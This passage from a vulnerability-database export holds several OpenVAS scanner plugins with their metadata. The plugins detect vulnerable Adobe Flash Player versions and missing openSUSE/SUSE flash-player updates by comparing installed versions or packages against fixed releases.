This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 
Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.903340\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_bugtraq_id(65704, 65703, 65702);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-02-24 18:04:57 +0530 (Mon, 24 Feb 2014)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 Feb14 (Linux)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw is due to multiple unspecified and a double free error.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to, disclose potentially\nsensitive information and compromise a user's system.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.2.202.341 on Linux\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.2.202.341 or later.\");\n script_tag(name:\"qod_type\", 
value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57057\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-07.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 SecPod\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.341\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"11.2.202.341\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:27", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.", "cvss3": {}, "published": "2014-02-24T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 Feb14 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310903338", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310903338", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 Feb14 (Windows)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the 
Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.903338\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_bugtraq_id(65704, 65703, 65702);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-02-24 18:04:57 +0530 (Mon, 24 Feb 2014)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 Feb14 (Windows)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw is due to multiple unspecified and a double free error.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to, disclose potentially\nsensitive information and compromise a user's system.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.7.700.269 and 11.8.x through 12.0.x\nbefore 12.0.0.70 on Windows\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.7.700.269 
or 12.0.0.70 or later.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57057\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-07.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 SecPod\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.7.700.269\") ||\n version_in_range(version:playerVer, test_version:\"11.8.0\", test_version2:\"12.0.0.69\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:39:06", "description": "The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2014-02-25T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for flash-player (openSUSE-SU-2014:0278-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850571", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850571", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the 
License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850571\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:47:57 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for flash-player (openSUSE-SU-2014:0278-1)\");\n\n script_tag(name:\"affected\", value:\"flash-player on openSUSE 11.4\");\n\n script_tag(name:\"insight\", value:\"Adobe Flash Player was updated to 11.2.202.341: (bnc#865021)\n\n * APSB14-07, CVE-2014-0498 CVE-2014-0499 CVE-2014-0502\n\n - Contents of flashplayer_11_sa.i386.tar.gz changed back:\n spec file updated, supplementary script (update.sh)\n updated.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:0278-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced 
advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE11\\.4\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.4\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.341~95.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.341~95.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.341~95.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:25", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.", "cvss3": {}, "published": "2014-02-24T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 Feb14 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310903339", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310903339", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 Feb14 (Mac OS X)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright 
(C) 2014 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.903339\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_bugtraq_id(65704, 65703, 65702);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-02-24 18:21:06 +0530 (Mon, 24 Feb 2014)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 Feb14 (Mac OS X)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw is due to multiple unspecified and a double free error.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to, disclose potentially\nsensitive information and compromise a user's system.\");\n 
script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.7.700.269 and 11.8.x through 12.0.x\nbefore 12.0.0.70 on Mac OS X\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.7.700.269 or 12.0.0.70 or later.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57057\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-07.html\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2014 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.7.700.269\") ||\n version_in_range(version:playerVer, test_version:\"11.8.0\", test_version2:\"12.0.0.69\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:16", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nsecurity bypass vulnerabilities.", "cvss3": {}, "published": "2014-03-20T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Security Bypass Vulnerabilities - 01 Feb14 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310804515", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804515", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash 
Player Multiple Security Bypass Vulnerabilities - 01 Feb14 (Mac OS X)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804515\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_bugtraq_id(66122, 66127);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-03-20 10:50:26 +0530 (Thu, 20 Mar 2014)\");\n script_name(\"Adobe Flash Player Multiple Security Bypass Vulnerabilities - 01 Feb14 (Mac OS X)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nsecurity bypass vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw are due to multiple unspecified errors.\");\n 
script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to bypass certain security\nrestrictions and disclose potentially sensitive information.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.7.700.272 and 11.8.x through 12.0.x\nbefore 12.0.0.77 on Mac OS X\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.7.700.272 or 12.0.0.77 or later.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57271\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-08.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.7.700.272\") ||\n version_in_range(version:playerVer, test_version:\"11.8.0\", test_version2:\"12.0.0.76\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-01-31T18:39:20", "description": "The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2014-03-17T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for flash-player (openSUSE-SU-2014:0379-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850576", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850576", "sourceData": "# Copyright (C) 
2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850576\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-03-17 13:34:20 +0530 (Mon, 17 Mar 2014)\");\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_name(\"openSUSE: Security Advisory for flash-player (openSUSE-SU-2014:0379-1)\");\n\n script_tag(name:\"affected\", value:\"flash-player on openSUSE 11.4\");\n\n script_tag(name:\"insight\", value:\"Adobe Flash Player was updated to version 11.2.202.346 to\n fix security issues:\n\n CVE-2014-0503: A vulnerability that could be used to bypass\n the same origin policy was fixed.\n\n CVE-2014-0504: A vulnerability that could be used to read\n the contents of the clipboard was fixed.\n\n More information can be found on the referenced vendor advisory.\");\n\n 
script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-08.html\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:0379-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE11\\.4\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.4\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.346~99.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.346~99.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.346~99.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-04-22T17:03:07", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nsecurity bypass vulnerabilities.", "cvss3": {}, "published": 
"2014-03-20T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Security Bypass Vulnerabilities - 01 Feb14 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2020-04-20T00:00:00", "id": "OPENVAS:1361412562310804516", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804516", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Security Bypass Vulnerabilities - 01 Feb14 (Linux)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804516\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_bugtraq_id(66122, 66127);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-03-20 10:54:21 +0530 (Thu, 20 Mar 2014)\");\n script_name(\"Adobe Flash Player Multiple Security Bypass Vulnerabilities - 01 Feb14 (Linux)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nsecurity bypass vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw are due to multiple unspecified errors.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to bypass certain security\nrestrictions and disclose potentially sensitive information.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.2.202.346 on Linux.\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.2.202.346 or later.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57271\");\n script_xref(name:\"URL\", 
value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-08.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.346\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"11.2.202.346\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-01-31T18:37:14", "description": "The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2014:0387-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850951", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850951", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850951\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 14:56:42 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2014:0387-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Adobe Flash Player was updated to version 11.2.202.346 to\n fix security issues:\n\n * CVE-2014-0503: A vulnerability that could be used to\n bypass the same origin policy was fixed.\n\n * CVE-2014-0504: A vulnerability that could be used to\n read the contents of the clipboard was fixed.\n\n Security Issues references:\n\n * CVE-2014-0503\n\n * CVE-2014-0504\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:0387-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n 
